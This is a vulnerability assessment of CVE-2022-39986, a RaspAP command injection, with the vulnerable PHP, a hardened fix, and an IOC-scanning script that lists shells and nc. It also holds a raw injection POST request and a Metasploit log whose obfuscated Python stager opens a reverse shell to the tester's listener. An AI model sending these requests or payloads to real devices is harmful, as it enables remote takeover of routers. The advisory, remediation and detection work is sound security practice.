Attacker Value
Low
(1 user assessed)
Exploitability
High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network

CVE-2022-39986

Disclosure Date: August 01, 2023
MITRE ATT&CK Tactics
Execution
Validation
Validated
Metasploit Module

Description

A command injection vulnerability in RaspAP 2.8.0 through 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.

Ratings
  • Attacker Value
    Low
  • Exploitability
    High
Technical Analysis

This is an unauthenticated command injection vulnerability in RaspAP, wireless router software that runs on Debian-based devices. The vulnerable raspap-webgui application shouldn't be configured to be internet facing, which is reflected in this assessment's Attacker Value. Most endpoints on the application require a valid CSRF token to be accessed, except for a few, which include:

  • /ajax/openvpn/activate_ovpncfg.php
  • /ajax/openvpn/del_ovpncfg.php

These two endpoints accept a POST parameter cfg_id which gets run directly in a PHP exec() command without being sanitized. The vulnerable code can be seen below, or in full on the RaspAP raspap-webgui GitHub repository.

<?php

require_once '../../includes/config.php';
require_once '../../includes/functions.php';

if (isset($_POST['cfg_id'])) {
    // cfg_id is taken straight from the request body with no validation
    $ovpncfg_id = $_POST['cfg_id'];
    $ovpncfg_client = RASPI_OPENVPN_CLIENT_PATH.$ovpncfg_id.'_client.conf';
    $ovpncfg_login = RASPI_OPENVPN_CLIENT_PATH.$ovpncfg_id.'_login.conf';

    // remove existing client config +login and symbolically link the selected one
    // $ovpncfg_client is interpolated unquoted into the shell command line
    system("sudo rm ".RASPI_OPENVPN_CLIENT_CONFIG, $return);
    system("sudo ln -s $ovpncfg_client ".RASPI_OPENVPN_CLIENT_CONFIG, $return);
}
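
The following is an added example, not RaspAP's own code, showing how the handler pattern above can be hardened: cfg_id is checked against a strict identifier allowlist before it is used, and every path is wrapped in escapeshellarg() before it reaches the shell. The RASPI_* constants, the validate_cfg_id() and build_activate_commands() helpers, and the decision to return the command strings instead of executing them are all assumptions made so the script runs stand-alone without sudo. The missing CSRF check on these endpoints is a separate issue that this snippet does not address.

```php
<?php
// Added example (not RaspAP's code): hardened handling of the cfg_id
// parameter. Constants are defined here only so the script runs alone.
declare(strict_types=1);

if (!defined('RASPI_OPENVPN_CLIENT_PATH')) {
    define('RASPI_OPENVPN_CLIENT_PATH', '/etc/openvpn/client/');      // assumed path
}
if (!defined('RASPI_OPENVPN_CLIENT_CONFIG')) {
    define('RASPI_OPENVPN_CLIENT_CONFIG', '/etc/openvpn/client/client.conf'); // assumed path
}

/**
 * Returns the cfg_id unchanged if it is a plain identifier, null otherwise.
 * Shell metacharacters (';', '|', '$', spaces), path separators and '..'
 * all fail the allowlist, so the write-up's payload never reaches system().
 */
function validate_cfg_id(string $id): ?string
{
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/', $id) === 1 ? $id : null;
}

/**
 * Builds the two commands the activate handler would run, or returns null
 * when the id fails validation. The strings are returned rather than
 * executed so the example is safe to run; a real handler would pass each
 * one to system() and check $return.
 */
function build_activate_commands(string $rawId): ?array
{
    $id = validate_cfg_id($rawId);
    if ($id === null) {
        return null;
    }
    $client = RASPI_OPENVPN_CLIENT_PATH . $id . '_client.conf';
    $target = RASPI_OPENVPN_CLIENT_CONFIG;
    return [
        'sudo rm -f ' . escapeshellarg($target),
        'sudo ln -s ' . escapeshellarg($client) . ' ' . escapeshellarg($target),
    ];
}

// Demonstration: a benign id, the injection payload from the write-up,
// and a path-traversal attempt. Only the first is accepted.
foreach (['myvpn', ';touch /tmp/pwned;#', '../../etc/passwd'] as $candidate) {
    $cmds = build_activate_commands($candidate);
    if ($cmds === null) {
        echo 'rejected: ' . json_encode($candidate) . PHP_EOL;
    } else {
        echo 'accepted: ' . implode(' && ', $cmds) . PHP_EOL;
    }
}
```

Run it with `php hardened_cfg_id.php`. The allowlist does the real work; escapeshellarg() is defence in depth for the case where a future change lets a less restrictive value through.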

This vulnerability can be exploited with a simple POST request in order to inject the following command: touch /tmp/pwned

POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1
Host: 172.16.199.130
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.4; rv:109.0) Gecko/20100101 Firefox/114.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 642

cfg_id%3D%3Btouch%20%2Ftmp%2Fpwned%3B%23

Or, if getting a shell is more your thing, use the new Metasploit module to obtain a Meterpreter session:

msf6 > use exploit/unix/http/raspap_rce 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(unix/http/raspap_rce) > set rhosts 172.16.199.130
rhosts => 172.16.199.130
msf6 exploit(unix/http/raspap_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(unix/http/raspap_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix Command with echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNo9UE1LxDAQPTe/IrckGMNmqZVdrCDiQUQEd28i0iajhqZpSLJaFf+7DVmcwwxv5s2bDzP6KSQcJzVA4t/W9LzvIjQ1jykcVOLJjIBep4BnbBwOnXsDKldsi6oUvhZfxbY0ixLomh/x7uH67mW3f7y5umeZJ9TkHKhEKZHnayEbITcbIQmvF2OZ0gfoBlTBrMCnrJ2Hi2gBPD1jyLZlJ3FwvlMDJZe3hEcRQH3QReBp9Yx0e8SWoc93YwFbcFSzC7vI6ZP/6mlJMwQzKJrPFhrUNPoAMdLyAdE3dU5qyEz+QyLZxl+G/gDVz18D\'\)\[0\]\)\)\) | exec $(which python || which python3 || which python2) -
[*] Sending stage (24772 bytes) to 172.16.199.130
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.130:48494) at 2023-08-14 20:38:21 -0400

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : debian
OS           : Linux 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-2 (2023-07-27)
Architecture : x64
Meterpreter  : python/linux
meterpreter > 

IOCs

Since this is exploiting a parameter in a POST request, you won't see the payload in the logs. It might be worth searching for suspicious processes spawned by the user running the RaspAP application. The user www-data is running the RaspAP application in this case, and after running the Metasploit module, due to the Python payload selected by default, there is a suspicious /usr/bin/python3 command running in the context of the user www-data.

Before

msfuser@debian:~$ ps aux | grep www-data
www-data     866  0.0  0.1   5568  3804 ?        Ss   20:00   0:00 /usr/sbin/lighttpd -D -f /etc/lighttpd/lighttpd.conf
www-data     879  0.0  1.0 201008 21552 ?        Ss   20:00   0:00 /usr/bin/php-cgi
www-data     925  0.0  0.3 201008  5976 ?        S    20:00   0:00 /usr/bin/php-cgi
www-data     928  0.0  0.3 201008  5976 ?        S    20:00   0:00 /usr/bin/php-cgi
www-data     929  0.0  0.3 201008  5976 ?        S    20:00   0:00 /usr/bin/php-cgi
www-data     930  0.0  0.3 201008  5976 ?        S    20:00   0:00 /usr/bin/php-cgi
msfuser     2786  0.0  0.1   6332  2012 pts/0    S+   20:03   0:00 grep www-data

After

msfuser@debian:~$ ps aux | grep www-data
www-data     866  0.0  0.1   5568  3804 ?        Ss   20:00   0:00 /usr/sbin/lighttpd -D -f /etc/lighttpd/lighttpd.conf
www-data     879  0.0  1.0 201008 21552 ?        Ss   20:00   0:00 /usr/bin/php-cgi
www-data     925  0.0  0.3 201008  5976 ?        S    20:00   0:00 /usr/bin/php-cgi
www-data     928  0.0  0.6 201008 12404 ?        S    20:00   0:00 /usr/bin/php-cgi
www-data     929  0.0  0.5 201008 11468 ?        S    20:00   0:00 /usr/bin/php-cgi
www-data     930  0.0  0.3 201008  5976 ?        S    20:00   0:00 /usr/bin/php-cgi
www-data    2839  0.0  0.0      0     0 ?        Z    20:07   0:00 [sh] <defunct>
www-data    2846  1.3  1.5  43792 30976 ?        Ss   20:07   0:00 /usr/bin/python3 -
msfuser     2853  0.0  0.1   6332  2060 pts/0    S+   20:08   0:00 grep www-data
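
The check described above, as an added example that is not part of this assessment: a small script that scans ps aux output for processes owned by the web-server user that are not part of the expected RaspAP process tree. The sample input is the "After" listing above with a header row added; the allowlist of expected executables, the list of interpreters and shells, and the helper names parse_ps_line() and find_unexpected_processes() are assumptions for a stock lighttpd plus php-cgi deployment and should be adapted to the host being checked.

```php
<?php
// Added example (not part of the write-up): flag processes owned by the
// web user that fall outside the expected lighttpd/php-cgi tree.
declare(strict_types=1);

const WEB_USER = 'www-data';

// Executables the web user is expected to run on a stock RaspAP host (assumption).
const EXPECTED_CMDS = ['/usr/sbin/lighttpd', '/usr/bin/php-cgi'];

// Interpreters and shells that php-cgi should never be spawning (assumption).
const SUSPICIOUS_CMDS = [
    '/usr/bin/python', '/usr/bin/python2', '/usr/bin/python3',
    '/bin/sh', '/bin/bash', 'sh', 'bash', 'perl', 'nc', 'ncat',
];

/**
 * Parses one `ps aux` line into user, pid, stat and command.
 * Returns null for the header row or malformed lines. COMMAND may contain
 * spaces, so the line is split into at most eleven fields.
 */
function parse_ps_line(string $line): ?array
{
    $fields = preg_split('/\s+/', trim($line), 11);
    if ($fields === false || count($fields) < 11 || $fields[0] === 'USER') {
        return null;
    }
    return [
        'user'    => $fields[0],
        'pid'     => (int) $fields[1],
        'stat'    => $fields[7],
        'command' => $fields[10],
    ];
}

/**
 * Returns every process owned by $user whose executable is not on the
 * allowlist, with a short reason for each finding.
 */
function find_unexpected_processes(string $psOutput, string $user = WEB_USER): array
{
    $findings = [];
    foreach (explode("\n", $psOutput) as $line) {
        $proc = parse_ps_line($line);
        if ($proc === null || $proc['user'] !== $user) {
            continue;
        }
        // Kernel-reported names of exited processes appear as "[name]".
        $argv0 = trim(explode(' ', $proc['command'])[0], '[]');
        if (in_array($argv0, EXPECTED_CMDS, true)) {
            continue;
        }
        $reason = in_array($argv0, SUSPICIOUS_CMDS, true)
            ? 'interpreter/shell spawned by web user'
            : 'not on allowlist';
        if (str_starts_with($proc['stat'], 'Z')) {
            $reason .= ' (zombie: parent exited after spawning it)';
        }
        $findings[] = ['pid' => $proc['pid'], 'command' => $proc['command'], 'reason' => $reason];
    }
    return $findings;
}

// Sample input: the "After" listing from above, with the ps header row added.
$sample = <<<'PS'
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
www-data     866  0.0  0.1   5568  3804 ?        Ss   20:00   0:00 /usr/sbin/lighttpd -D -f /etc/lighttpd/lighttpd.conf
www-data     879  0.0  1.0 201008 21552 ?        Ss   20:00   0:00 /usr/bin/php-cgi
www-data     925  0.0  0.3 201008  5976 ?        S    20:00   0:00 /usr/bin/php-cgi
www-data    2839  0.0  0.0      0     0 ?        Z    20:07   0:00 [sh] <defunct>
www-data    2846  1.3  1.5  43792 30976 ?        Ss   20:07   0:00 /usr/bin/python3 -
msfuser     2853  0.0  0.1   6332  2060 pts/0    S+   20:08   0:00 grep www-data
PS;

foreach (find_unexpected_processes($sample) as $f) {
    printf("pid %d: %s  [%s]\n", $f['pid'], $f['command'], $f['reason']);
}
```

On a live host, feed it real output with `ps aux | php check_www_data.php`-style plumbing by reading STDIN instead of the embedded sample; the two hits it reports on the sample are the defunct sh and the python3 child, which match the IOCs described above.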

Notes

The initial PoC write-up mentioned in the references below indicates the command injection will result in execution in the context of the root user. This is incorrect and depends on how the RaspAP application has been deployed.

References

https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2
https://github.com/rapid7/metasploit-framework/pull/18263

CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • raspap

Products

  • raspap
